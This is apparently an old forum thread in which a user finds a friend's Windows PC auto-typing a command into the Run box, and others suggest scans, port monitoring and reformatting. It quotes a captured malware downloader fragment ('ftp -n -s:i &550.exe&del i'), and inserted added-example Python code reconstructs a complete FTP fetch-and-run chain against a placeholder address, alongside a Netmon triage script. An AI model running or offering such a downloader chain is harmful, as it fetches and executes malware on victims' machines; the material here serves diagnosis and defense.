
Help kill a bug


eaglescouter

Friend says his box BSOD'd on him, so I agreed to look at it. For me it booted up just fine.

I ran:
ccleaner
spybot s&d
AVG scan
housecall trend micro online scan
hijack this
Windows Defender

Nothing particularly interesting showed up... until 11:30 tonight!

While cruising the OCForums, the Run window popped up and text was magically typed into the window. I interrupted it and copied part of the line, which prevented execution.

This has tried to run two times in the past 10 minutes. I'm looking for bug hunting suggestions so this thing can be killed dead in its tracks.

Here is the text I was able to grab, first part was lost, this is the end of the command:

ho quit >> i &ftp -n -s:i &550.exe&del i&exit
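The fragment above is the tail of a very common downloader chain: a series of `echo ... >> i` commands builds a tiny FTP script in a file named `i`, `ftp -n -s:i` runs that script unattended (no auto-login, commands read from the file), the fetched binary (`550.exe` here) is executed, and `del i` removes the evidence. As an added example (not code from the thread or from any tool named in it), here is a small Python parser that reconstructs that chain from a captured command line. `PAGE_FRAGMENT` is the text quoted in the post; `FULL_EXAMPLE` is a constructed complete instance of the same pattern using the documentation address 192.0.2.10, and the handling of a cut-off `echo` (the leading `ho`) is an assumption made for this fragment.

```python
"""Reconstruct the cmd.exe "echo ... >> file & ftp -n -s:file & payload & del file"
downloader chain from a captured command line.

Added example, not code from the thread. PAGE_FRAGMENT is the tail quoted in the
post above; FULL_EXAMPLE is a constructed complete instance of the same pattern
(192.0.2.10 is a documentation address, not a real drop server).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

PAGE_FRAGMENT = "ho quit >> i &ftp -n -s:i &550.exe&del i&exit"
FULL_EXAMPLE = (
    "cmd /c echo open 192.0.2.10 21 >> i&echo user ftp ftp >> i&echo binary >> i"
    "&echo get 550.exe >> i&echo quit >> i&ftp -n -s:i&550.exe&del i&exit"
)

# ftp.exe run unattended: -n suppresses auto-login, -s:<file> reads commands from <file>.
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\b[^&]*?-s:([^\s&]+)", re.IGNORECASE)
# "<text> >> <file>" or "<text> > <file>": one line written into the script file.
REDIRECT_RE = re.compile(r"^(.*?)\s*>>?\s*(\S+)$")
CMD_PREFIX_RE = re.compile(r"^cmd(?:\.exe)?\s+/c\s+", re.IGNORECASE)


@dataclass
class FtpDropper:
    script_file: str
    script_lines: List[str] = field(default_factory=list)  # reconstructed FTP script
    executed: List[str] = field(default_factory=list)      # run after ftp returns
    cleanup: List[str] = field(default_factory=list)       # del/erase of the script
    truncated: bool = False                                # a leading 'echo' was cut off


def split_chain(cmdline: str) -> List[str]:
    """Split a cmd.exe chain on & and &&. Quoting is ignored: these droppers never quote."""
    return [p.strip() for p in re.split(r"&&|&", cmdline) if p.strip()]


def _echo_payload(text: str) -> Tuple[str, bool]:
    """Drop 'cmd /c' and the 'echo' keyword. Assumption for the page's fragment: a
    first word that is the tail of 'echo' (e.g. 'ho') is a cut-off echo."""
    text = CMD_PREFIX_RE.sub("", text)
    head, _, rest = text.partition(" ")
    if head and "echo".endswith(head.lower()):
        return rest.strip(), head.lower() != "echo"
    return text, False


def analyze(cmdline: str) -> Optional[FtpDropper]:
    """Return the reconstructed dropper, or None if the line does not use ftp -s:."""
    m = FTP_SCRIPT_RE.search(cmdline)
    if not m:
        return None
    dropper = FtpDropper(script_file=m.group(1))
    after_ftp = False
    for part in split_chain(cmdline):
        if FTP_SCRIPT_RE.search(part):
            after_ftp = True
            continue
        redirect = REDIRECT_RE.match(part)
        if redirect and redirect.group(2) == dropper.script_file:
            line, cut = _echo_payload(redirect.group(1))
            dropper.script_lines.append(line)
            dropper.truncated |= cut
        elif re.match(r"(?i)^(del|erase)\s", part):
            dropper.cleanup.append(part)
        elif part.lower() != "exit" and after_ftp:
            dropper.executed.append(part)
    return dropper


def fetched_files(dropper: FtpDropper) -> List[str]:
    """Files the FTP script pulls down (get/mget/recv lines)."""
    files: List[str] = []
    for line in dropper.script_lines:
        words = line.split()
        if len(words) >= 2 and words[0].lower() in ("get", "mget", "recv"):
            files.extend(words[1:])
    return files


def is_ftp_dropper(cmdline: str) -> bool:
    """Script built by the same chain, fed to unattended ftp, something run afterwards."""
    d = analyze(cmdline)
    return d is not None and bool(d.script_lines) and bool(d.executed)


if __name__ == "__main__":
    for sample in (PAGE_FRAGMENT, FULL_EXAMPLE):
        d = analyze(sample)
        print(d.script_lines, "->", d.executed, "(truncated)" if d.truncated else "")
```

Even from the truncated tail the parser recovers the script file name, the `quit` line, the executed payload and the cleanup step; on the constructed full chain it also yields the drop server, credentials and the `get` line, so `fetched_files()` ties the downloaded name to the binary that was run. Nothing here needs the payload to still exist on disk, which matters because the `del i` step and the attacker's own cleanup usually leave only the command line behind.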
 
You're going to have to scan a little better. I use two blockers to go with Search & Destroy and my AV; SpywareGuard and SpywareBlaster have kept my rig spotless.

I would try a few other AV scans, and if that doesn't work it sounds like a perfect time for a fresh install.
 
This looks like someone has taken over the machine.

First thing to do is lock out the internet until the worm/trojan is gone. Do all your work in Safe Mode. This will reduce any chance of it respawning.

Run a vigorous regimen of virus scanners. Grab a few updated freeware/trialware ones from the net on another machine. Run them at the highest level you can get them.

First dump the restore points and any temp files. If you find some odd entries, remove them, then restart the machine after you think you got them. Then rescan with the VS that got it first, just to make sure it did not respawn.

I found Kaspersky is good at the odd things. It gives a good hit rate. If you find a tidbit on what it is and where it is living, you can have an easier time removing it for good.

Once it is removed, find a better virus scan/firewall solution. :D
 
Most of the critters I ran across lived in the C:\WINDOWS\system32 folder, or in drivers. So if you find any bugs, there's a good chance they will be lurking in there. There are some uncommon spots also, but most are stuck in that area.

Good luck!!
 
Is your buddy running RealVNC? If so, there is a security issue regarding password authentication. To fix this you can update his free version to 4.1.2 or his paid version to 4.2.3 or later. Unfortunately, this does look like someone has compromised the computer. If you really want to get to the bottom of it, you might want to download --Hijackthis-- (be sure to rename the .exe file to something random, as some programs can detect hijackthis.exe running) and also try running rootkit-revealing programs such as --Rootkit Revealer-- and/or any of the programs at the bottom of --This Page--. But, as others have recommended, once your computer is compromised, the only way to guarantee it is safe is to reformat.

If you would like to read more about this issue, you can try one of the following links:
I hope this solves the problem, but if not.. let us know.. we will keep on looking!


Raven
 
RealVNC was installed but not running when I spotted the suspicious activity. Since the machine was behind a router, VNC was not running, and the box has a new IP behind my router, I doubt that a human was actively working the voodoo; I suspect it was a script of some sort.

I have set Kaspersky on active duty, password-protected the settings in Kaspersky, and told it to report everything. We may just have to wait for the voodoo to try to run again and get caught and identified.

Every AV product is returning a report of a clean system. HijackThis shows nothing unusual either.
 
I would retrain the firewall and see if any hits show up.

If you have a software firewall reset the config. If it is pure hardware based, grab a good software firewall and use it for the popup notifications. Plus I would be looking at the firewall logs to see what external IP is talking to the computer.
 
Even though RealVNC was not running, its service probably was. I would still advise you to disable its service (Since I do not have first hand experience with RealVNC, I would click on Start > Run > Services.msc and look through and disable it there) and upgrade to the latest version. This should prevent any more of those 'run' pop-ups from appearing.
 
VNC was not running because I had uninstalled it, and the service was no longer present. Even HijackThis showed no sign of vnc.

While I admit that I do not know the source of this bug, I can be relatively certain that VNC was not part of what I saw last night.
 
eaglescouter said:
realvnc was installed but not running when I spotted the suspicious activity.
eaglescouter said:
VNC was not running because I had uninstalled it, ...
The reason I was pushing for RealVNC was because in your previous post you had stated that it was installed, and, after googling your problem, many of the results came back with symptoms similar to what your friend had experienced. But, since you now seem to imply that the problem persists even though RealVNC was uninstalled, and since you are "relatively certain that VNC was not part of what I saw last night", I will continue to look for other explanations for you and post back if I can find anything else.
 
Why not use netmon or something similar to see what ports are open, and where connections are being made? Sounds like this machine is owned, big time.
 
C:\Program Files\Netmon\11-23-06.txt
Timestamp: 2:34:42 PM Nov 23 06
Generated by: Netmon 1.6

Remote address : *:*
Local address : *:loc-svr
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : *:ms-cifs
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 127.0.0.1:1033
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 127.0.0.1:1034
Protocol : TCP
Status : Listening

Remote address : localhost:31416
Local address : 127.0.0.1:1040
Protocol : TCP
Status : Time wait

Remote address : *:*
Local address : 127.0.0.1:1042
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 127.0.0.1:10110
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 127.0.0.1:31416
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 192.168.0.102:netbios-ssn
Protocol : TCP
Status : Listening

Remote address : 64.62.193.183:http
Local address : 192.168.0.102:1415
Protocol : TCP
Status : Time wait
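The listing above has three kinds of entries worth separating: listeners bound to `*` or to the 192.168.0.102 LAN address (reachable by anything on the network), listeners bound to 127.0.0.1 (reachable only from the box itself), and the one remote peer outside private address space, 64.62.193.183:http, seen in TIME_WAIT on local port 1415. As an added example (not from the thread, and not Netmon's own code), here is a Python triage of that record format; `NETMON_SAMPLE` is an excerpt of the posted listing with Netmon's service names left exactly as printed.

```python
"""Triage a Netmon-style socket listing: which listeners are reachable from the
network and which remote peers are outside the LAN.

Added example, not from the thread or from Netmon. NETMON_SAMPLE is an excerpt of
the listing posted above, with Netmon's service names left as printed.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

NETMON_SAMPLE = """\
Remote address : *:*
Local address : *:loc-svr
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : *:ms-cifs
Protocol : TCP
Status : Listening

Remote address : localhost:31416
Local address : 127.0.0.1:1040
Protocol : TCP
Status : Time wait

Remote address : *:*
Local address : 127.0.0.1:31416
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 192.168.0.102:netbios-ssn
Protocol : TCP
Status : Listening

Remote address : 64.62.193.183:http
Local address : 192.168.0.102:1415
Protocol : TCP
Status : Time wait
"""


@dataclass(frozen=True)
class Socket:
    local_host: str
    local_port: str    # number or service name, exactly as Netmon printed it
    remote_host: str
    remote_port: str
    protocol: str
    status: str


def _endpoint(value: str) -> Tuple[str, str]:
    host, _, port = value.rpartition(":")
    return host, port


def parse_netmon(text: str) -> List[Socket]:
    """One record per blank-line-separated block of 'Key : value' lines."""
    sockets = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            fields[key.strip().lower()] = value.strip()
        lh, lp = _endpoint(fields["local address"])
        rh, rp = _endpoint(fields["remote address"])
        sockets.append(Socket(lh, lp, rh, rp, fields["protocol"], fields["status"]))
    return sockets


def host_class(host: str) -> str:
    """'any' (wildcard bind), 'loopback', 'private' (RFC 1918), 'external' or 'name'."""
    if host == "*":
        return "any"
    if host.lower() == "localhost":
        return "loopback"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "name"
    if ip.is_loopback:
        return "loopback"
    return "private" if ip.is_private else "external"


def triage(sockets: List[Socket]) -> Dict[str, List[Socket]]:
    """Listeners bound to anything but loopback are reachable by a LAN worm; peers
    outside RFC 1918 space are the addresses to whois and hunt in firewall logs."""
    out: Dict[str, List[Socket]] = {"exposed_listeners": [], "loopback_listeners": [],
                                    "external_peers": [], "lan_peers": []}
    for s in sockets:
        if s.status.lower() == "listening":
            exposed = host_class(s.local_host) != "loopback"
            out["exposed_listeners" if exposed else "loopback_listeners"].append(s)
        else:
            cls = host_class(s.remote_host)
            if cls == "external":
                out["external_peers"].append(s)
            elif cls == "private":
                out["lan_peers"].append(s)
    return out


def whois_targets(sockets: List[Socket]) -> List[str]:
    """Distinct external peer addresses, sorted."""
    return sorted({s.remote_host for s in triage(sockets)["external_peers"]})


if __name__ == "__main__":
    for bucket, socks in triage(parse_netmon(NETMON_SAMPLE)).items():
        print(bucket, [(s.local_host, s.local_port, s.remote_host, s.remote_port) for s in socks])
```

The split is the point: the RPC and SMB listeners on `*` and on the LAN address are standard XP services, but they are exactly the surface a LAN worm uses, so they belong on a separate list from the loopback-only ports (31416 on 127.0.0.1 is BOINC's default GUI-RPC port, consistent with a SETI@home box). Netmon prints no owning process, so tying local port 1415 back to a binary needs either its process view or `netstat -ano` on XP, whose `-o` column gives the PID; TIME_WAIT also means that connection had just closed, so the earlier it is captured the better.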
 
Got your PM. Check out this link (scroll down to the first informative response):

http://www.experts-exchange.com/Miscellaneous/Q_20873048.html

Do a 'netstat -a' from the command prompt, then pipe and filter the output to narrow down the results. Also, do a 'netmon -O' to see which processes are commanding which ports. Additionally, you should take a look at open processes in the Task Manager.

If that box isn't already off the network, unplug it now. Then start looking through the netmon results and googling the ports which look suspicious.
 
So the bottom line is: Somebody got access to the box, performed unknown tasks, and the only real solution is to tear the house down and reinstall following a format.

Since the crook got in, he is assumed to have his own key.

Format it shall be. Thank you for your assistance, this is an awesome forum.
 
The external IP in there resolves to... Hurricane Electric HURRICANE-4. I'd say owned and botnetted. You may want to contact them and let them know that they are part of a botnet now :eek:

Never mind. I did a bit of checking and that particular server is a noted spam scum hideout. Your friend might have been getting enlisted in a bit of spamming. Reformat and educate on staying away from these little nasties.
 